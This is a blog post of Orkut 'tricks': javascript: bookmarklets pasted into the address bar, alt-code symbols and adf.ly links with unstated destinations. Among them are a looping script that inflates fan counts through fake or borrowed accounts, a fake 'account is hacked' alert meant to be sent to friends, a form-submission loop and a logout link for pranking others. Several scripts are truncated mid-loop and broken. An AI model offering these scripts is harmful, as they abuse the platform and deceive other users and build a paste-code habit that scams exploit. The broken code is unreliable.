write this code at the beginning of the scrap without quotes
"&amp;#8238"








4) Many of u Won't Know this :
You can see where all of your orkut friends are located by checking out the new "friends map" feature. This feature combines Google Maps and orkut profiles to let you see where all of your friends live around the world. To see the "friends map," just follow these steps:
1. Click the "view friends" link in the "my friends" box on your orkut homepage.
2. Click the "friends map" tab at the top of the page.

You can click on a friend’s profile picture to see their location on the map. Please know that if we don't have map data for a particular region or if your friend chose not to put their location in their orkut profile, you'll see a message "(not on map)" below their profile name.
You can also click on the "tiny little blue men" to see your friends' locations. By clicking on one of these figures, a bubble will pop open to let you know which friend lives in that location.


Trust me an Intellegent Feature of Orkut


While U are singned in at Orkut : click in The Link Below: its Gr8


Or copy and Paste the following in Your Address Bar


http://adf.ly/C6CV




5)Watch the Pictures of ur Friends in Action:




copy and paste this code in your Scrapbook's Address Bar




javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i






6) Blank Scrap


How to write blank scrap / blank post ?
If you like the service, please do refer your friends to use our free service by clicking HERE


For writing blank scrap, follow the steps:


1) Open any scrapbook.
2) Write [i] in the scrapbook.
3) Do NOT write anything else in the scrapbook, and submit the scrap.
That's all.
NOTE:
You can also use [b] tag instead of [i] tag
You can also use this method to post a blank entry in any community forum.











7) Colorful Scrap








For writing multi colored scrap, follow the steps:




1) Open any scrapbook.


2) Write your message in the scrap. Do NOT click on submit.


3) Copy the following text and paste it in your address bar






javascript:cor=new Array('aqua','blue','fuchsia','gold','gray','green','lime','maroon','navy','olive','orange','pink','purple','red','silver','teal',
'violet', 'yellow' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y






4) Hit ENTER key .
5) Click on Submit




n ur scrap is now multicoloured








8) How to make your name invisible in your profile?




For making your name invisible follow the steps:
1) Click on edit profile
2) Type ALT + 0173 in your first name and last name. (i.e. Type 0173 while pressing the ALT key of your keyboard.)
3) Click on Update




8.1) Make your Picture invisible in your profile !




In MS Paint, create the smallest image possible and den upload it I.E. 1X1 pic!!
virtually unclickable ! n u are invisible now !!



9) Image Expander

To expand the display image of any profile
1) Open any profile whose display image you want to expand.
2) Copy the following text and paste it in your address bar

javascript:mwunm=128;void(setInterval("mwunm++;document.images[2].width=mwunm",5))

3) Hit ENTER key of your keyboard.

10) Double the size of your Friends Image

Follow the steps:
1) Open any profile whose friends' images you wish to double.
2) Copy the following text and paste it in your address bar

javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,"medium");void(0)

3) Hit ENTER key

11) Image Roller

Follow the steps:
1) Open any page that contains images.
2) Copy the following text and paste it in your address bar

javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0)

3) Hit ENTER key

12) Increase Fans ( Working Code ) Really Amazing

Follow the steps:
1) Create a fake account or simply login with ur friends Id.. and add yourself as a friend there.
2) Visit the FRIENDS page by logging into your just created fake account or the Friends account.
3) Point your cursor on the fan icon () beside your real profile. Note your status bar. It should be showing something like javascript:setKarma('FRUS*******/US*******'). Note the code FRUS******* and US******* somewhere. Now, click on the star so as to make your fake account a fan of your real account.
4) Copy the following code to your address bar (The location where you type
http://www.orkut.com ). Replace FRUS******* and US******* in the following script with the one you noted in the above step.

javascript:function cmd(){window.location="/setkarma?cat=0&amp;val=3&amp;gid=FRUS*******/US*******";}void(setInterval(cmd,2000));

5) Hit ENTER key of your keyboard. The page will keep on reloading and your fans will keep on increasing with an approximate speed of 6 fans per second untl you close the window.

13) Mirror Links

These links if clicked redirects the person who clicked to his/her profile..
U can use these in Your Profile like :MY best frnd" and any one who clicks on these links u define will see hes/her own profile.
this will give out d profile:
http://adf.ly/C6Cg


this will give out the Album :
http://adf.ly/C6Ck
this will give out the Scrapbook :
http://adf.ly/C6Co
14) Make ur Page Colorful

1) Open your scrapbook.
2) Copy the following text and paste it in your address bar

javascript: i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);

3) Hit ENTER key
15) A Java Trick that Pops Message " Ur Account Is Hacked"

javascript:function reverse() { var inp = " ! luhaR yb dekcah si tnuocca tukrO ruoY "; var outp="";for (i = 0; i &lt;= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();
copy and paste d Above link On Address Bar.. n replace "luhaR" by ur own Name.. n send it to ur friends
Or u can Manually create Any kind of Alert Box by
javascript:alert(" TYPE ANY MESSAGE HERE TO APPEAR IN ALERT BOX ")
copy and paste d above in the address Bar,

16) Watch the Pictures With a Snake Effect

javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);DIS.top=A(1.6,6,150)}setInterval('R++;B(R%DIL)',15);void(0)
17) Negative Posts : u see the Posts in negative numbers
javascript:sar=document.getElementsByTagName('input');document.body.innerHTML+='';document.forms[1].target='NegFlood';omdt_lowposts=setInterval("sar['topicId'].value='';sar['commId'].value='';sar['messageId'].value='';submitForm(document.forms[1],'delete','')", 1000);void(0)
Note: You need to be the author/Creator of the topic in the Community to be able to use this .......


18) Try These Cool Font Generators : Its Easy

First Write Your Message in the Scrap Text Box . After you Are Done with typing your message
Simply Copy and Paste these Links In the Address Bar above the same page( scrapbook page )
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/A/gi,"Å");txt.value=txt.value.replace(/B/gi,"ß");txt.value=txt.value.replace(/C/gi,"©");txt.value=txt.value.replace(/D/gi,"Ð");txt.value=txt.value.replace(/E/gi,"Ë");txt.value=txt.value.replace(/F/gi,"ƒ");txt.value=txt.value.replace(/i/gi,"î");txt.value=txt.value.replace(/s/gi,"§");txt.value=txt.value.replace(/o/gi,"ø");txt.value=txt.value.replace(/u/gi,"µ");txt.value=txt.value.replace(/r/gi,"®");void(0);

This is the Second One

javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y
19 ) Lame trick to frustate someone:

just creeped to my mind so m sharin wid you.
The best link to setup as your homepage is
https://www.orkut.com/GLogin.aspx?cmd=logout
When someone click on this the person will be logged out from his/her orkut session
20) Speed up Logging to Orkut.

Bookmark the following link and use it to login into orkut!
http://adf.ly/C6Cv
The above link directly opens orkut login box! So it is faster than normal orkut login.
21) Adding Special Symbols in Scraps !!!!!!!!!!!!!!!

This is a much awaited trick on Orkut
very less users know about it
be d one n Impress ur friends !!
here it is
Press alt key and d following 4rm num pad ...
alt + 987 - █
alt + 1 - ☺
alt + 2 - ☻
alt + 3 - ♥
alt + 4 - ♦
alt + 5 - ♣
alt + 6 - ♠
alt + 7 - •
alt + 8 - ◘
alt + 9 - ○
alt + 0178 - ²
alt + 0489 - é
alt + 0756 - ô
alt + 0742 - æ
alt + 0719 - Ï
alt + 0739 - ã
alt + 0729 - Ù
the same way many combinations can be tried..
keep trying it and do upload it here as comments
keep posting.

22) Crush List On Orkut!! full Explanation

Have you ever wondered how the Orkut "Add to my crush-list" option works?
Most of us are scared to add someone to our crush-list
because of the fear that he/she will get a notification from Orkut that you have added him/her on your crush-list.



YES, they will get such a notification.
But that is only if they too add you on their crush list.
In fact, you both will get a message from Orkut if you both have added each other on your respective crush lists.



This is a fantastic piece of innovation from Orkut wherein one-side crushes
will not be notified and if mutual crush exists, then both sides will come to
know of it.



Spreading this information is important. It will help the cause of many
people and who knows, you may be the lucky one too!!!



So start adding people to your crush-lists now and spreading this vital
information!!!



23) Write scraps in Hindi !

Right click on the link below n open it in a new window !
click here to write in hindi
Go to Quillpad for Hindi, Telugu, Tamil, Kannada, Malayalam and Marathi.




 

Recent Posts

Review this blog on Bloggers.com

Recent Comments

| KrackoWorld (KoW) © 2014. All Rights Reserved | Style By All Web Designing | | Contact |